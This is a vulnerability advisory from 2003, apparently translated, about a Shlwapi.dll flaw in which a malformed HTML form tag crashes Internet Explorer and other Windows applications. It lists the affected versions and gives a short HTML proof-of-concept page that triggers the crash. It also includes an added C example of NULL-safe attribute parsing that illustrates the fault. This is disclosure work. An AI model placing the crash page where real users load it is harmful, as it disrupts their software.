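Microsoft Shlwapi.dll Malformed HTML Form Tag Remote Denial of Service Vulnerability
Published: 2003-04-22
Updated: 2003-04-23
Severity: Medium
Threat: Remote denial of service
Error type: Failure to handle exceptional conditions
Exploitation method: Client mode
BUGTRAQ ID: 7402
Affected systems:
Microsoft Shlwapi.dll 6.0.2800.1106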
+ Microsoft FrontPage 2000
+ Microsoft FrontPage 2000 SP2
+ Microsoft FrontPage 2000 SR1
+ Microsoft FrontPage 2002
+ Microsoft FrontPage 2002 SP1
+ Microsoft FrontPage 97
+ Microsoft FrontPage 98
+ Microsoft Internet Explorer 5.0
+ Microsoft Internet Explorer 5.0.1
+ Microsoft Internet Explorer 5.0.1 SP1
+ Microsoft Internet Explorer 5.0.1 SP2
+ Microsoft Internet Explorer 5.0.1 SP3
+ Microsoft Internet Explorer 5.5
+ Microsoft Internet Explorer 5.5 SP1
+ Microsoft Internet Explorer 5.5 SP2
+ Microsoft Internet Explorer 6.0
+ Microsoft Internet Explorer 6.0 SP1
+ Microsoft Windows .NET Datacenter Server Beta 3
+ Microsoft Windows .NET Enterprise Server Beta 3
+ Microsoft Windows .NET Enterprise Server RC2
+ Microsoft Windows .NET Standard Server Beta 3
+ Microsoft Windows .NET Web Server Beta 3
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Advanced Server SP3
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Datacenter Server SP3
+ Microsoft Windows 2000 Professional
+ Microsoft Windows 2000 Professional SP1
+ Microsoft Windows 2000 Professional SP2
+ Microsoft Windows 2000 Professional SP3
+ Microsoft Windows 2000 Server
+ Microsoft Windows 2000 Server SP1
+ Microsoft Windows 2000 Server SP2
+ Microsoft Windows 2000 Server SP3
+ Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Terminal Services SP3
+ Microsoft Windows ME
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition 64-bit
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition 64-bit
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home SP1
+ Microsoft Windows XP Professional
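+ Microsoft Windows XP Professional SP1
Detailed description:
The 'shlwapi.dll' dynamic library can cause the calling application to fail when it processes certain malicious HTML tags.
The problem may be caused by a string comparison operation in which one of the strings is a NULL pointer. An attacker can build a malicious page that, when visited by a user, crashes an application such as IE.
Test code:
---------------------------------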
<html>
<form>
<input type crash>
</form>
</html>
---------------------------------
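The suspected failure mode described above (a string comparison where one operand is a NULL pointer), as an added C example that is not code from the advisory or from Shlwapi.dll: a toy attribute parser in which the valueless attribute of `<input type crash>` yields NULL, and the comparison treats NULL as "no match" instead of dereferencing it. The names attr_value, eq_nocase and classify_input are hypothetical, and the parser only recognises lowercase attribute names.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

enum input_kind { KIND_TEXT, KIND_CHECKBOX, KIND_RADIO };

/* Hypothetical helper: copy the value of attribute `name` from a tag into
 * `out`. Returns `out`, or NULL when the attribute is absent or valueless. */
static const char *attr_value(const char *tag, const char *name,
                              char *out, size_t cap)
{
    size_t n = strlen(name), i = 0;
    for (const char *p = tag; (p = strstr(p, name)) != NULL; p += n) {
        if (p == tag || !isspace((unsigned char)p[-1]) ||
            isalnum((unsigned char)p[n]))
            continue;                       /* part of a longer word */
        const char *q = p + n;
        while (isspace((unsigned char)*q)) q++;
        if (*q != '=') return NULL;         /* e.g. <input type crash> */
        for (q++; isspace((unsigned char)*q); q++) {}
        if (*q == '"' || *q == '\'') q++;   /* optional opening quote */
        while (*q && !strchr("\"' >", *q) && i + 1 < cap) out[i++] = *q++;
        out[i] = '\0';
        return out;
    }
    return NULL;
}

/* NULL-safe, case-insensitive equality: a missing string never matches. */
static int eq_nocase(const char *a, const char *b)
{
    if (a == NULL || b == NULL) return 0;
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == *b;
}

/* A missing, valueless or unknown type falls back to the HTML default. */
enum input_kind classify_input(const char *tag)
{
    char buf[32];
    const char *v = attr_value(tag, "type", buf, sizeof buf);
    if (eq_nocase(v, "checkbox")) return KIND_CHECKBOX;
    if (eq_nocase(v, "radio")) return KIND_RADIO;
    return KIND_TEXT;
}

int main(void) { return classify_input("<input type crash>") == KIND_TEXT ? 0 : 1; }
```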
Solution: None yet
Related information: Ramon Pinuaga Cascales <rpinuaga@s21sec.com>.
References: http://www.securityfocus.com/archive/1/319360
http://www.securityfocus.com/archive/1/319421
http://www.securityfocus.com/archive/1/319488